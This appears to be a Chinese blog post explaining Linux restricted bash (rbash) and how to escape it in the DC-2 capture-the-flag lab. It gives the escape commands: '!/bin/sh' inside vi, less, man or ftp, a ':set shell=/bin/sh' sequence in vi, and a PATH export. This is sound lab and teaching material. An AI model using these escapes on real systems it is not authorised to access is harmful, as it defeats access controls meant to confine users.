-
linux进行rbash逃逸的方法
目录
一、什么是rbash
受限shell是linux shell限制一些bash shell中的功能,并且是从名字上很清楚。该限制很好地显示了命令以及脚本在受限shell中运行。它为linux中的bash shell提供了一个额外的安全层。
不能使用cd命令;
不能设置或取消环境变量:SHELL,PATH,ENV,BASH_ENV;
导入功能受限;
指定包含参数’/’或’-’的文件名;
不能使用>,>|,<>,>&,&>,>>等重定向操作符;
不能使用’set +r’或者’set +o’关闭。
二、rbash逃逸
(一)rbash限制提示
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
(二)rbash逃逸方法
利用系统常见应用逃逸,常见利用的命令如下。
ftp
more
less
man
vi
vim
以上在输入的地方输入!/bin/sh或!/bin/bash。
(三)利用vi命令进行rbash逃逸案例
1. vi flag3.txt文本文件
2. 输入英文冒号:
3. 在冒号后输入set shell=/bin/sh回车
4. 输入:shell调用/bin/sh
5. 逃逸成功
6. 设置命令路径变量
rbash逃逸之后,在shell中添加命令路径变量:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin7. 验证cat flag3.txt
可以使用cat命令查看文件内容。
-
相关阅读:
门牌制作(蓝桥杯)
凯撒密码用c语言实现
hashmap的一些坑
Spring Security笔记
vue和react区别?
【java|golang】多字段排序以及排序规则
计算机操作系统详解
《lwip学习1》-数据流篇
SpringBoot@Profile详解
R语言ggplot2可视化:使用ggpubr包的ggbarplot函数可视化柱状图、color参数指定柱状图的边框的色彩
- 原文地址:https://blog.csdn.net/u013930899/article/details/126815615